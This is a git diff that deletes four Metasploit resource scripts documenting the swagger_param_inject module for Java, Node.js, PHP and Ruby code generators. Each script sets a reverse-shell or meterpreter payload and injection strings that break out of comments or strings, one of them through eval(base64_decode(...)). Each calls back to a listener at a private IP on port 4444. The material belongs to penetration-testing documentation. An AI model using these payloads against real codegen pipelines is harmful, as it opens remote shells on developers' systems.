diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc deleted file mode 100644 index 2139734518..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc +++ /dev/null @@ -1,11 +0,0 @@ -set PAYLOAD java/jsp_shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "PATH" -set PAYLOAD_PREFIX "a\\\"; " - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc deleted file mode 100644 index 36a24b256f..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc +++ /dev/null @@ -1,13 +0,0 @@ -set PAYLOAD nodejs/shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set INFO_VERSION "1.0.0" -set PAYLOAD_LOC "PATH" -set PAYLOAD_PREFIX "/a');};};return exports;}));" -set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('" - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc deleted file mode 100644 index fd7502cf9b..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc +++ /dev/null @@ -1,11 +0,0 @@ -set PAYLOAD php/meterpreter/reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('" -set PAYLOAD_SUFFIX "')); /*" - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc deleted file mode 100644 index a69fdda505..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc +++ /dev/null @@ -1,12 +0,0 @@ -set PAYLOAD ruby/shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "INFO_TITLE" -set PAYLOAD_PREFIX "=end " -set INFO_DESCRIPTION "=begin " - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file